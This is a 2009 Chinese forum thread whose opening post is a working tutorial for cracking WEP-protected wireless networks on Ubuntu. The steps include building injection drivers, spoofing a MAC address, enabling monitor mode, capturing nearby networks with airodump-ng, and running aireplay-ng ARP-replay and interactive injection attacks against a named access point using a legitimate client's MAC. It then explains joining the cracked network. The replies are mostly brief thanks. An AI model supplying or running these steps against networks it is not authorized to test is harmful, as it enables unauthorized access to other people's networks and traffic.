ubnt解决方案
查看: 20585|回复: 25

[资料] 详解Ubuntu无线破解流程

[复制链接]

517

回帖

5892

积分

191 小时

在线时间

中校

注册时间
2008-10-30
金币
4477 个
威望
75 个
荣誉
25 个

尚未签到

发表于 2009-4-25 22:06
破解安装和使用大致流程如下
sudo apt-get install libnl-dev libssl-dev libertas
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2009-04-16.tar.bz2
#注意 http://wireless.kernel.org/download/compat-wireless-2009-04-16.tar.bz2 一定要下载最新的包
#我这里只是演示而已
sudo cp compat-wireless-2009-04-16.tar.bz2 /usr/src #把包移到/usr/src
sudo tar xf compat-wireless-2009-04-16.tar.bz2        #解压
cd compat-wireless-2009-04-16.tar.bz2                #编译前记得开无线开关
sudo make                                            #编译
sudo make install                     #编译安装
sudo rmmod iwlagn   iwlcore                          #暂时卸载驱动
sudo make load                                       #加载新的无线驱动,不行就重启一下
                        #如果出现下面的
                        Unloading mac80211...
                        FATAL: Module mac80211 is in use.
                        Unloading cfg80211...
                        FATAL: Module cfg80211 is in use.
                        make: *** [unload] Error 1
                        就是没暂时卸载驱动,执行sudo rmmod iwlagn   iwlcore

#sudo make uninstall &&sudo reboot                   #卸载新的无线驱动并重启
使用
我就以4965卡为例子
#下面是改变mac地址
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
#下面开始使用
sudo ifconfig wlan0 up           #启用wlan0接口
sudo airmon-ng start wlan0       #开mon0 注入接口
#出现monitor mode enabled on mon0就正常
sudo aireplay-ng -9 mon0         #测试是否能注入
#正常就出现Injection is working!
#不然就No Answer...
#可以用sudo iwconfig wlan0 channel 6 来转到第6频道,6就是频道,你可以换11或1
#改变后sudo aireplay-ng -9 mon0    再次测试
#开始破解,具体可以参考中卫的BT3 破解无线WEP和WPA增加版教程.pdf
我就用4965比较支持的aireplay-ng 参数 -0 -1 -2 -3 来说明一下
记得,ubuntu8.10后抓包和注入都用mon0(mon系列的接口)
-3 有客户端
airodump-ng -w test --ivs -c 6 mon0 #用mon0接口来抓取频道6的ivs(破解wep用的包) 名字是test
#出现的一堆东西.现在就是抓包破解了,最基本的,如果你有时间,你就可以等,等它的data足够到支持破解为止
#下面介绍下airodump-ng出现的数据
BSSID              PWR RXQ Beacons    #Data, #/s CH MB ENC CIPHER AUTH ES
00:19:E0:94:07:30 163   0        9        0    0   6 54. WPA2 CCMP   PSK h
#00:19:E0:94:07:30 就是AP的mac       Data就是wep破解需要的包 data多到一定程度就可以用aircrack-ng破解
#ENC 对应的是加密方式,好像上面那行的话就是wpa2,是不能这个抓包的方式破解的要wep才可以
00:1D:0F:7C:19:5E 167   0       15        0    0   5 54. WPA2 CCMP   PSK 2
00:21:27:81:66:E6 164   0       43        7    0   6 54. WEP WEP         1
00:21:27:61:38:86 166   0        9        4    1   4 54. WPA2 CCMP   PSK 2
00:21:27:1B:B1:F8 163   0       16        3    0   6 54. WPA2 CCMP   PSK ?
00:1D:0F:43:46:54 179   5       58       29    5   6 54. WEP WEP    OPN S
00:21:27:73:04:C0 163   0        4        0    0   6 54. WEP WEP         6
00:1D:0F:36:43:0E 165   5       47       29    1   6 54. WEP WEP         ±
00:21:27:64:25:42 164   2       52        0    0   6 54. WPA2 CCMP   PSK D
                                                                              
BSSID              STATION            PWR   Rate Lost Packets Probes      
                                                                              
00:19:E0:94:07:30 00:1C:26:A3:23:B9 163   0- 1    20        2 huhuusb     
#上面那行   00:19:E0:94:07:30 就是ap的mac 00:1C:26:A3:23:B9 就是它合法的客户端
00:21:27:1B:B1:F8 00:22:5F:16:91:CB 166   0- 2   165        3               
00:1D:0F:43:46:54 00:13:E8:68:A5:CD 164   0- 1     3       12               
00:1D:0F:43:46:54 00:13:E8:65:68:9F 165   0- 1    20        4 Sky         
(not associated)   00:1D:E0:6D:CB:07 174   0- 1     0        1               
(not associated)   00:13:E8:65:5A:9B 163   0- 1     0        1   
#ok 下面来-3(有客户端)注入
sudo aireplay-ng -3 -b 00:19:E0:94:07:30 -h 00:1C:26:A3:23:B9 mon0
#成功的话 airodump-ng上的对应mac的data就会不断上升就可以用aircrack破解了
#-2
#sudo aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <合法客户端 mac> wifi0
sudo aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:19:E0:94:07:30 -h 00:1C:26:A3:23:B9 mon0
#按y就可以了
#其他的我就不演示,大家参考BT3 破解无线WEP和WPA增加版教程.pdf

接入无线wep
1
开无线
2
ifconfig wlan0 up #打开接口
iwlist scan #扫描无线网络
sudo iwconfig #查看无线设置
iwconfig wlan0 key password ap ap's_mac essid nick_name
#例子如下
sudo iwconfig wlan0 key 1234567890 essid Sky ap 00:1D:0F:43:46:54
#记得用完上面的那条命令iwconfig查看,essid, Access Point Encryption key 一定要有才能接入
#很多时候 出现 Access Point: Not-Associated ,你就要用sudo iwconfig wlan0 ap off/any 来尝试
#再不行就用ifconfig wlan0 up 再用iwconfig 重新设置
sudo dhclient wlan0 #利用dhcp 接入无线
接入wpa方法按的blog复制下来,你一般不需要用到
ubuntu不能用dhclinet wlan0 接入wpa加密的AP
我的方法就是利用模拟FAKE注入来接入AP
然后用dhclinet wlan0 来获得IP
First of all
you must know wpa's AP password ,essid,bssid
#essid is AP's MAC
wpa_passphrase TP-LINK password >acc_wpa
Then
vi acc_wpa
#add bssid after ssid
#example bssid=00:90:96:00:00:02
At last
sudo wpa_supplicant -c test -Dwired -i wlan0
sudo iwconfig wlan0 essid TP-LINK key 0123456789 ap 00:90:96:00:00:02
iwconfig
#if it return as follow
wlan0     IEEE 802.11abgn ESSID:"TP-LINK"
          Mode:Managed Frequency:2.412 GHz Access Point: 00:90:96:00:00:02
#Then you can access wpa's AP
dhclient wlan0

517

回帖

5892

积分

191 小时

在线时间

中校

注册时间
2008-10-30
金币
4477 个
威望
75 个
荣誉
25 个

尚未签到

发表于 2009-5-1 01:27
:)

186

回帖

465

积分

22 小时

在线时间

少尉

注册时间
2009-7-26
金币
253 个
威望
4 个
荣誉
0 个
累计签到:1 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2009-7-26 22:51
学习学习学习

181

回帖

393

积分

78 小时

在线时间

少尉

注册时间
2009-6-26
金币
197 个
威望
1 个
荣誉
0 个

尚未签到

发表于 2009-9-19 09:11
学习学习!!!!!!

4

回帖

8

积分

2 小时

在线时间

预备兵

注册时间
2009-10-3
金币
4 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-10-3 23:09
好贴,我要试试哇

176

回帖

651

积分

129 小时

在线时间

中尉

注册时间
2009-6-2
金币
445 个
威望
3 个
荣誉
0 个

尚未签到

发表于 2009-10-3 23:17
刚好在学习UBUNTUo(∩_∩)o 哈哈

4

回帖

6

积分

3 小时

在线时间

预备兵

注册时间
2009-10-14
金币
2 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-10-14 04:46
这么好的帖子,我得支持一个

617

回帖

5494

积分

170 小时

在线时间

中校

注册时间
2009-10-14
金币
4750 个
威望
8 个
荣誉
1 个

尚未签到

发表于 2009-10-14 23:30

23

回帖

28

积分

3 小时

在线时间

新兵上阵

注册时间
2009-10-14
金币
5 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-10-15 00:13
学习学习啊正想学的

26

回帖

47

积分

4 小时

在线时间

新兵上阵

注册时间
2009-11-19
金币
21 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-12-23 14:32
gaoshoua xuexi

350

回帖

3093

积分

28 小时

在线时间

少校

注册时间
2009-3-5
金币
2672 个
威望
12 个
荣誉
0 个
累计签到:3 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2009-12-28 12:05
过来顶一下哦!

42

回帖

134

积分

7 小时

在线时间

上等兵

注册时间
2009-12-24
金币
91 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-1-4 02:22
看的头大!!!

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2024-11-1 07:17

返回顶部 返回列表